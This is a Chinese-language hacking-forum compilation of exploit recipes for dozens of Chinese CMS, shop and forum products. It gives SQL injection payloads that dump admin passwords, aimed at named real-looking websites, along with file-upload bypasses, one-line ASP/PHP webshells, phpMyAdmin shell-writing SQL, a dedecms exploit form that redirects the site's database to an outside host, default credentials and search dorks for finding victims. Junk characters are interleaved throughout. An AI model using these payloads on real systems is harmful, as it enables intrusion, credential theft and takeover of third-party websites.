启航企业建站系统 cookie注入漏洞通杀所有版本& Y2 Q" T) X8 K$ [
, E. P" `6 f; R0 M2 z1 B/ m直接上exploit:
; c. l1 [; h' Z% i P( f6 Tjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));, y2 x# x, ~! Q! l) `
test:http://www.tb11.net/system/xitong/shownews.asp?id=2108 c. h! u( u9 y5 c. }' z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ C. |' i' h+ }) y/ I* v
Asprain论坛 注册用户 上传图片就可拿到webshell
7 a7 ?$ f2 P0 d; }: L# H3 W( e, |# D" A5 \; {
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
. g7 ? x& u4 t E" h1.txt存放你的一句话马 如:<%execute(request("cmd"))%>- S" T( u" ~& b" H7 [" M4 T3 a
2.gif 为一小图片文件,一定要小,比如qq表情图片
6 N3 z5 ^* G9 _# O4 o; J% |+ F2 L3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用' c4 O, [2 u l$ H3 c9 _
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
* ~. _, k: Y" C5.q.asp;.gif
" _! v Z) }5 f6 [google:Powered by Asprain5 b$ C3 l W6 f$ Y7 c4 b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 j: ~: s: D5 e' k) k H1 x% Z( B+ z, N g* d b# |
ShopNum1全部系统存在上传漏洞。
- C/ G9 T: J/ H- ?
7 g5 A/ x, s2 O7 ?- J0 x首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。5 P# F5 S( N. ]: X- B I* m7 ?
按说明 提示登录后台。。
, t0 [+ E$ h, j: @) L, {7 f在后台功能页面->附件管理->附件列表4 P4 H# @- E! T' c- [
可以直接上传.aspx 后缀木马
+ \& A5 \* m% t$ }. ^6 c* C A& dhttp://demo.shopnum1.com/upload/20110720083822500.aspx3 H# P1 K; ^, H j' w
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 N) b7 u5 w; x- T% d% q- S, _, J
牛牛CMS中小企业网站管理系统 上传漏洞0 p$ F2 _# J9 C! ~! |. y7 A5 ^
5 G) Z% f0 b8 Y$ a牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
2 A# t# @4 u6 w e0 g# h) \后台:admin/login.asp8 |" l7 Y: W. i( B
ewebeditor 5.5 Nday
6 ^) F7 U8 ?% C9 b+ Q; I; kexp:
) P7 d @, f9 t9 ` @+ \6 u<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
0 a4 R q+ T4 Z9 l( T<input?type=file?name=uploadfile?size=100><br><br>?# o/ H8 r8 V; n
<input?type=submit?value=upload>?
0 t! q; ]8 P$ |$ |& B% r</form>) L' x/ ]! a5 j: `6 \
ps:先上传小马.* H: n8 I/ F. G0 K; `
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏8 W! L3 v0 \8 w: v- g
; c$ v( n6 q$ [# o o2 u' L& q# V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) j$ N* `$ ~, n- ? t0 M
9 z# _3 [" O z" X2 I- {# KYothCMS 遍历目录漏洞
4 Q4 t- \0 s7 ]" p
. n; @3 j- M5 `: }优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
+ V. i- d6 m$ ?) ^默认后台:admin/login.asp2 O. t8 K9 o7 D# g7 `2 }+ Z6 J9 J
遍历目录:9 h7 o! m9 A, k i0 I5 H
ewebeditor/manage/upload.asp?id=1&dir=../" B w4 d! r" W3 W7 v& m7 A
data:
1 v; C; I" {8 p' q9 x( j( Rhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa, ^2 h+ P3 r4 b4 E1 q$ R
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& s. i4 V* ?" ~+ |7 S$ b! N1 ^ G) C7 Y0 S) u' y
Net112企业建站系统 1.05 f# E1 c: Q7 B7 O$ }' L% O
7 Y& A) p* N" ]. x5 c0 ?
源码简介:" @# t3 Z7 Z3 V7 [
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
+ g: k$ ^, J# Z4 r* ]5 G& |' _4 m添加管理员:# @) r8 G& e7 q
http://www.0855.tv/admin/admin.asp?action=add&level=2
8 O( ^! l6 @1 G; d其实加不加都不是很重要,后台文件都没怎么作验证。
# P. X. Y4 H5 Z. M) \上传路径:( \3 \3 s- a+ z
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
/ ^3 t8 F( J3 B- ~( D8 Xhttp://www.0855.tv/inc/Upfile.asp?Stype=2
5 Y+ T$ \; g+ l# b- M; c怎么利用自己研究。
5 o7 g Z9 I3 } H5 d* y遍历目录:' u8 S5 l: D; d* e# m
http://www.0855.tv/admin/upfile.asp?path=../..# j: u/ U# k) Y/ @: w
如:. v u0 w; E7 N* Q- ?
http://www.0855.tv/admin/upfile.asp?path=../admin- b8 V0 ~) _ O7 ~
http://www.0855.tv/admin/upfile.asp?path=../data
7 v7 m0 e w* ^& }& C9 I% V--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- ^& H( n [5 |3 W, c. w4 D9 R; M$ `3 l! f8 g8 @3 k
易和阳光购物商城通杀 上传漏洞% `5 ?! E' b9 g
9 D! ^. D8 _7 k" C4 P; K& R
前提要求是IIS6.0+asp坏境。0 y& Y7 m; H+ w3 L
漏洞文件Iheeo_upfile.asp 4 N# S# ]4 T8 I- x3 j2 I n
过滤不严.直接可以iis6.0上传
; o. v) X! u. c6 {6 D$ [* ~2 h( x5 c把ASP木马改成0855.asp;1.gif
& R! ^9 f: a. l" O直接放到明小子上传
- V3 P. l2 h* g( I/ a0 sGoogle搜索:inurl:product.asp?Iheeoid=
/ [" N. i" ^5 M/ R% {7 K1 @; P+ K9 a--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 |) ]. z5 }! L K9 M* m6 i9 h' d/ d
phpmyadmin后台4种拿shell方法( S5 M, T0 d" t: }. d o3 q; {. q
$ v$ [+ Q1 |0 s5 O3 x2 |& \
方法一:
9 `4 t ?# O5 z/ @( DCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
$ w2 A, [ p, F' Z' vINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');6 c5 g3 i+ h' g- i! G( U
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
' y& ^9 u/ Q1 q. O, O& Q' d/ B/ |----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php8 U4 k% {- ~5 e0 f3 ?
一句话连接密码:xiaoma. E2 D; J0 N W: p
方法二:8 n8 t) L; M8 b- c
Create TABLE xiaoma (xiaoma1 text NOT NULL);( j4 O: T, d& ^# t
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
* F0 ^8 M7 N$ r& g6 xselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';7 _1 z; ^- }5 s1 C7 w# j
Drop TABLE IF EXISTS xiaoma;9 S- f. G+ \9 @, d& Y9 v: z8 N: Q
方法三:& a7 F, m4 u- d5 I
读取文件内容: select load_file('E:/xamp/www/s.php');
' Q. I" @ T! c写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
! w; @" Q( F- U" e* `4 Wcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'3 e! S% H; w3 G% u/ `' q
方法四:6 E5 \; Z1 G' b% i4 f1 F, j) K O
select load_file('E:/xamp/www/xiaoma.php');
+ M" l8 p% Q! q( X L' m* ^ dselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
% l- ]5 s% d9 b ^然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
2 _, V( a( P$ K! s: i! ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ R; i# j0 W9 |, g% Q- J# w3 y& b6 D
. T; g3 s L+ J* W3 V# `* c; n传信网络独立开发网站源码0day漏洞/ a' R4 n+ J p$ v( ^3 ]& J$ \
: V, d! t, ?5 o3 Z2 `5 O
后台system/login.asp+ k v: k6 g4 ~1 ]9 o% V [( a
进了后台有个ewebeditor
) c% y* R' T$ Z( C* w# YGoogle 搜索inurl:product1.asp?tyc=8 {& i0 F+ f* r( j. `8 s
编辑器漏洞默认后台ubbcode/admin_login.asp1 F& v/ u- ?# [, `9 w9 V
数据库ubbcode/db/ewebeditor.mdb$ d2 r! A4 I$ a' i
默认账号密码yzm 111111
R+ D- Q; R* a
9 u9 K3 D$ C9 S1 R! g拿webshell方法; j1 U' x( @( Q
登陆后台点击“样式管理”-选择新增样式 % j! s( {+ }7 F/ V/ ~+ `1 `* B( Y+ H
样式名称:scriptkiddies 随便写 7 @8 T1 x8 W: @/ h1 p
路径模式:选择绝对路径
- Y, R6 S/ R; Y4 |6 ]1 M图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx8 n. Y q6 a7 ?6 k
图片类型比如就是我们要上传的ASP木马格式/ p6 V" k; w( M( s; F
上传路径:/2 o, C0 ]( L R, L. o9 x7 W
图片限制:写上1000 免的上不了我们的asp木马
# h# Y/ w+ l/ O* k0 T# z上传内容不要写- Y+ t' w ]) T; _* O
可以提交了
* s! X+ ~: _& Y" L7 N+ }, c* H样式增加成功!
`. \$ A/ C* A* E2 I- i) {8 J返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 4 S3 H4 ?, U& R% ]9 L/ w9 r
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
( {: D: _9 j' T6 `3 k; g网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
6 c" a4 ]" r9 O! i2 M& ~% d上ASP木马 回车 等到路径7 k. f& Q) ]: d, r
0 z3 @! u1 u$ r C$ x: L
后台:system/login.asp
% M$ A) Y q e) A4 N% }5 I; b" YExp:
1 A6 m- g1 @ Zand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master0 ~8 {8 E4 w. o) Q1 o* l% _: d
测试:1 L6 D1 z9 l5 R5 ]( @
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
9 f9 H I( a* O) u) f# khttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master% s! K* z6 h9 O, n' d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; Z5 W" D$ p/ W$ M
6 O ?' B/ T# d: n P
foosun 0day 最新注入漏洞( s( z/ O$ T" y0 w( F
3 J; I! A- M! M* i8 h! C9 H
漏洞文件:www.xxx.com/user/SetNextOptions.asp; D! _2 w& o, U! d* g: R' T
利用简单的方法:% I. x6 `( S) C1 ~3 z( {
暴管理员帐号:" ?7 x9 ~4 o2 n( ~) y
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin. k0 e! \* k/ t4 J9 d0 T1 i
暴管理员密码:5 O8 |: O# X* t- Q O: Q& O
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
' x5 p' \0 o3 N6 z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- B7 S- a# p' i: N3 _9 D: c! c, \
网站程序的版权未知!
" D6 O% F3 L; o3 P, q, S5 d% \% C- m
6 o0 P4 V8 h- c: j/ a6 b) B+ x5 M2 q默认网站数据库:9 P! C4 V% ?0 i! E
www.i0day.com/data/nxnews.mdb
0 N% p3 e! C) @; E/ K5 dewebeditor 在线编辑器:) Q/ O4 U! `) }7 v" ~" D
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
+ N2 @) k _6 X- m登录地址:ewebeditor/admin_login.asp; L( X4 z# `! S8 b6 F* U. }% J) V( q9 A
默认密码:admin admin
2 Q. {0 A! b& x" k: ~登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data8 [& T1 W% w6 g8 J: Z3 {
# X( K, j1 |2 M
Sql注入漏洞:7 I# ?; a. k8 `" a
http://www.i0day.com/detail.asp?id=12
8 ]# b$ R& j/ `. l5 t5 h9 Rexp:" r& }) m& w% J! x' n8 ~& n
union select 1,admin,password,4,5,6,7,8 from admin
! q- @ `! K4 A爆出明文帐号/密码: d- c& P' O% F2 @4 @' P* H
4 f& Q4 {7 O* C: O上传漏洞:1 W5 O! s* D) C3 Y; F) n
后台+upfile.asp
' X9 x- v* o' f0 }0 X1 V如:
7 p7 v, W' |+ Z% c+ u& Vhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。8 D9 p4 l/ q. t# e7 q9 K
shell的地址:网址+后台+成功上传的马
3 L0 A$ j1 s+ t' [- m! Wgoogle:inurl:news.asp?lanmuName=0 x ?! \7 [$ Y5 ?1 s( u
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# @* M( u7 {$ N! b
8 I& r9 r6 j# E; d" V9 o& Ldedecms最新0day利用不进后台直接拿WEBSHELL6 r' `1 ?6 `' r! p. L* ~
: z) {& u' h6 V1 O W1 c+ X1 @& h
拿webshell的方法如下:4 B- E" G. r, j! w4 [1 v2 Y7 S
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
6 U! L J0 d9 {9 ?5 y前题条件,必须准备好自己的dede数据库,然后插入数据:
& v1 b$ Q& M2 s9 hinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 2 d& |9 C: m; S" ~# m" }- M% u D
: L! k+ a0 ]2 I' T& K
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。0 P) h D& \+ N2 q7 u& h0 a* _
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">5 l" P( _5 P( N
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
j d# h* q* u4 U, X<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
+ e8 v g, j9 v- q9 }. i" D( L<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />0 {1 H1 P+ r+ q4 V- S3 A
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
4 O! d" a; z! u1 \0 h, I<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />9 k! G+ ~: k1 b8 b
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
j) k1 J8 m' ?5 U1 Y<input type="text" value="true" name="nocache" style="width:400">1 s9 c% p& F8 _6 B6 `
<input type="submit" value="提交" name="QuickSearchBtn"><br />( D( V% o8 _2 M5 J
</form>4 G% A! ]+ U4 l( B
<script>" Y+ o$ E, ~: c+ z( R
function addaction()0 t' ^+ v$ f) ^: G" q
{' ~) Y! I2 k( R6 o$ t8 b: d
document.QuickSearch.action=document.QuickSearch.doaction.value;. _- a: [# R' G
}
" X) j" ^6 C/ w$ v</script>
. b) ?2 G; @/ l" \9 \-----------------------------------------------------------------------------------------------------------------------------------------------
# t4 t1 W- e# t+ l9 S$ W, d# O8 h* @% `* p5 r
dedecms织梦暴最新严重0day漏洞
& R" @0 e7 u) v! X6 x, dbug被利用步骤如下:1 [& A* M, W. U# a5 J6 k
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
/ B F6 n+ P! i; S& | w6 U把上面{}上的字母改为当前的验证码,即可直接进入网站后台。) O% }, n+ L+ U4 n3 H0 b U
-------------------------------------------------------------------------------------------------------------------------------------------
* d) ?0 c# L- Q$ P7 W6 }
9 o- Q1 K H p u/ X多多淘宝客程序上传漏洞
8 l% z6 N( V8 v6 L漏洞页面:+ O6 a5 h* X% W
admin\upload_pic.php7 e/ Y: H+ N9 G* \0 T, x) ] B
传送门:
5 u# _! n# Q: c) p0 t9 y0 t7 ^) h5 \http://www.www.com/admin/upload_pic.php?uploadtext=slide1
1 y) B I- N4 x& s: o! p; JPS:copy张图片马 直接 xxx.php 上传抓包地址!5 t- S5 O& v' d; p9 B1 w+ G
------------------------------------------------------------------------------------------------------------------------------------------------------
' s% b7 ^$ X' {1 [; W- e8 D& h v2 K& O5 D; s* X5 U$ R# y
无忧公司系统ASP专业版后台上传漏洞0 x& h8 L- I/ [
漏洞文件 后台上传/ S5 m( h2 U3 V g- f4 G
admin/uploadPic.asp
% I( O3 j' ~( U, p+ w/ C1 }2 y漏洞利用 这个漏洞好像是雷池的) u/ V4 T* A4 a% [& M; v
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1! P3 O) k" H: ]8 Q1 C, M
等到的webshell路径:
$ P3 i4 [' o( b0 o m9 ~6 L. ~/UploadFiles/scriptkiddies.asp;_2.gif$ F9 x2 O$ B$ l& B5 [
---------------------------------------------------------------------------------------------------------------------------------------------------2 z2 }! W8 g6 i8 Y9 ?
8 _; `5 [7 f- V# B
住哪酒店分销联盟系统2010- Q1 ^1 K( @2 Z# K0 L" p
Search:: f9 X; M7 E+ S5 M% H- i6 U. J
inurl:index.php?m=hotelinfo0 q3 T9 Y& Q0 L" b* q
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
, k, ~3 ]; a) Z, K默认后台:index.php?m=admin/login* @# v7 }, K2 D* s8 X9 ?! `
--------------------------------------------------------------------------------------------------------------------------------------------------) C2 F4 Z1 h# \4 b
! K% j7 I: K9 i4 ^inurl:info_Print.asp?ArticleID=
+ E j, W, V7 q3 i后台 ad_login.asp* {- h( ?) w# R! i& ]' U {
爆管理员密码:3 s+ V" Q' d- C- i$ T' V1 D$ E! t
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin$ M- L- L- t2 n6 O' c5 t2 \
------------------------------------------------------------------------------------------------------------------------------------------------------------! r9 T1 w. U% X; h8 |( ]
0 S2 a" o' P. r' Y' P! z
搜索框漏洞!
& i# ~9 P1 e2 M# K%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='+ e+ D; G8 o- x& `5 U8 s
--------------------------------------------------------------------------------------------------------------------------------------------------------
. o6 @3 `4 J; w3 B# C5 m; u6 d9 k' Z! M$ K. K
关键字:% L* H# ?3 M, B' F
inurl:/reg_TemletSel.asp?step=2" S( F; `+ p# L S- [' Z5 n
或者% t4 H) Y) U+ y; G5 _: p
电子商务自助建站--您理想的助手
4 v' m5 Q4 |- |6 z( w-------------------------------------------------------------------------------------------------------------------------------------------------) Y" j, a+ @$ ?7 a' w
% V4 p4 v( |% G( ^( O; U0 A/ B) [iGiveTest 2.1.0注入漏洞
2 G2 P0 ]# X# P; ]2 h, aVersion: <= 2.1.0
2 o+ J3 J3 u( p$ s- y7 l# Homepage: http://iGiveTest.com/6 a6 Y. t4 m+ Y) x: |5 Y- {
谷歌关键字: “Powered by iGiveTest”; ]* R: o' u* F- K$ p8 P/ `" `
随便注册一个帐号。然后暴管理员帐号和密码 \: {) n* m- ?1 r9 j! ]) t
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
1 B a5 V! ~/ F! B$ L- Z, C------------------------------------------------------------------------------------------------------------------------------------------------3 a- K: W* E+ v# m% C
! y, Z! a& s# N. p4 ]; b
CKXP网上书店注入漏洞
9 M8 B. l# z$ g4 m! A5 x! |工具加表:shop_admin 加字段:admin
& C0 y5 g6 Q( v6 v* W& g1 q" @后台:admin/login.asp
. D5 J5 I. K0 `% {$ M: A登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
1 a' d) B7 V8 Binurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
. \+ J7 J' V) h: B0 [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 D; j$ p6 M7 a
+ z! C! Q* R. m. x! D8 V7 b7 F g段富超个人网站系统留言本写马漏洞
& `, `5 d9 s1 v+ z: X( ?; n源码下载:http://www.mycodes.net/24/2149.htm s( z% p/ J, d0 F0 l) z
addgbook.asp 提交一句话。/ b8 e# a0 q, V
连接: http://www.xxxx.tv/date/date3f.asp- b0 F0 j" t* D H" o# L4 @
google:为防批量,特略!
0 p9 T# d# E; V) O. O9 S1 x-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 c3 c+ B/ i) k1 m& a' ]
+ g9 C8 Q* S9 i# `9 }智有道专业旅游系统v1.0 注入及列目录漏洞: {0 C3 K( x$ N6 D2 o
默认后台路径:/admin/login.asp( v0 O& a; ^7 Y( [4 e
默认管理员:admin
3 H% `- Q& A1 J+ X默认密码:1234561 S; n" _. ]+ B; D
SQL EXP Tset:
5 {. j! [4 M& t/ d6 Yhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
5 h- c) s/ I; e: N3 Q( A6 Y------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) X7 X) `, K8 K1 r% E* i5 K, P9 H" V ?3 X; Q: R* v* z- O8 ]& r
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
9 ]# [) l6 @6 X- C$ bEXP:9 u8 W8 S! U% T- t
<title>eWebeditoR3.8 for php任意文件上EXP</title>
3 |- N/ n- L- t9 z% ]1 M" t7 v<form action="" method=post enctype="multip
5 N7 {& @7 h9 ?! m; I" l; K# t9 kart/form-data">
5 _# u$ p: i% z8 z8 g! u<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
f, ~- l3 Y: \ B% d5 JURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
: Q7 O* W2 a: }- K; f7 }! Y<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
1 j5 ]- q# L( I" W" u( e7 n6 m2 ~file:<input type=file name="uploadfile"><br> . b* ~6 r, I5 d6 b2 F4 z3 l/ A
<input type=button value=submit onclick=fsubmit()>
! p5 k/ A) N3 i; S) \" s</form><br> ( W' i; D, ~4 x# c2 Z3 o
<script> 3 X/ b$ S) `$ \* K
function fsubmit(){ " W0 j5 G4 a. q: e1 J& X' S% v# I
form = document.forms[0];
' r0 S( }5 X* N X: Eform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; 2 j) f) c5 e' e5 l2 o4 U; T
alert(form.action);
+ @" R% S; k: w8 w8 U) U0 S) p5 [form.submit(); 5 Q2 ^8 U# C# z% v* [6 i
}
5 z6 u# i* a* P' h$ b+ L9 z3 l</script> O9 |0 F% L, p
注意修改里面ewebeditor的名称还有路径。
& x2 V4 a6 P8 S3 U$ A---------------------------------------------------------------------------------------------------------------------------------------------------------------------------) F' D$ F/ U& P! W/ y* c }0 s4 `
5 s+ i; V- Z8 D% n提交’时提示ip被记录 防注入系统的利用
: `2 C" ~ w" o r w' }) d网址:http://www.xxx.com/newslist.asp?id=122′
Y4 A$ i& g7 D& ]5 M提示“你的操作已被记录!”等信息。2 R$ E: N% }, c6 ^
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。1 X6 B s! ~# m/ J
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* L; A6 d% g! ?+ ]: ? D4 |
# S5 J# j. \* j2 q; u8 R西部商务网站管理系统 批量拿shell-0day
2 u# Y& m: Q; m2 {这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb + P* P3 u) ]2 T. i& H* c
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
2 L2 y6 Q# M' o4 i# J+ t9 H2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合7 _+ {5 e8 I9 v8 R4 @5 r
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
0 g* k8 l5 W. n9 _) G, h8 G---------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 u1 i; N: `8 D6 A* x* c; K
! H Q3 R' j& J! _: |
JspRun!6.0 论坛管理后台注入漏洞$ C' Y( G& r0 j& A$ o
' R8 y1 P* g3 Z# nSEBUG-ID:20787 发布时间:2011-04-30 影响版本:* |+ K2 ^, _6 _
JspRun!6.0
# i6 \; W5 {: K6 ?) c7 d) P! c/ q漏洞描述:
9 O( z% H, Q7 l- j5 GJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
2 O Y: a" B# b5 {) c在处理后台提交的文件中ForumManageAction.java第1940行
$ u! P9 S8 v7 W& S' kString export = request.getParameter("export");//直接获取,没有安全过滤! C4 j# W# z: R4 \9 G3 {' z! c
if(export!=null){
( z2 Y+ a% {! y. RList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
! v# e- R# r9 e5 S# Gif(styles==null||styles.size()==0){
: g! ?% }: S( r<*参考8 I- Q9 r. b, B- _7 g1 v$ E
nuanfan@gmail.com+ L- L' o. s1 ]3 ~3 u
*> SEBUG安全建议:' P& x8 p! @; Z1 w7 M' B7 a
www.jsprun.net
& A* e" Q: o8 C(1)安全过滤变量export1 J8 a9 S! K, |, L0 A
(2)在查询语句中使用占位符
. j" b: E6 j7 c+ v# g------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 q% i# @0 T6 ?7 U/ u" T5 S, |1 [* C G' l W: z3 Q
乌邦图企业网站系统 cookies 注入) g( C, v7 ]& i" j- a% M& [
$ r J/ U) I/ R( v/ A程序完整登陆后台:/admin/login.asp4 T7 o$ Y, O$ B5 Z+ L) L# u6 y( X Q& p; h
默认登陆帐号:admin 密码:admin888
1 h/ Y E+ ^* B1 ^语句:(前面加个空格)
3 v0 o1 z | U/ _/ \4 U# _and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin2 z8 M4 _3 F2 T# F& I' g/ F) J
或者是16个字段:
7 q$ {. i1 E9 W4 C: xand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
, z. E- M) m8 {! l爆不出来自己猜字段。
% h- H; d1 w9 U8 M2 l- o& u; G/ a注入点:http://www.untnt.com/shownews.asp?=88
8 G3 N- z6 R7 pgetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
0 m: @. l3 f$ c: B9 L3 O4 J关键字:
/ v Z' S' C' r' Q* qinurl:shownews?asp.id=
- F2 J" o; M! i7 P J3 t: C& ]" t-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ P8 e0 {/ x3 a1 U+ C4 M
1 L1 |. H" g9 E5 O8 A
CKXP网上书店注入漏洞2 d" \/ {+ z1 ?" i! G2 }& `' j
- u4 L2 F2 s# o8 x2 M工具加表:shop_admin 加字段:admin9 l# |4 u) n: F0 e" t$ p
后台:admin/login.asp
. s& {2 ]8 G9 [: X6 r5 I& ^登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
% T8 K# f# C+ Z% q4 s2 c& O3 [0 Iinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
0 |9 \8 D" m9 x+ C* ]---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" J ?; @/ z. I1 [) d4 R7 t' _7 V3 g1 {4 H! C1 l) S
YxShop易想购物商城4.7.1版本任意文件上传漏洞! p- j+ E8 {" s: r! x# q J: X
7 s: {7 } ]: _/ o) O. H+ p
http://xxoo.com/controls/fckedit ... aspx/connector.aspx6 V. |) M/ Z' S4 M
跳转到网站根目录上传任意文件。
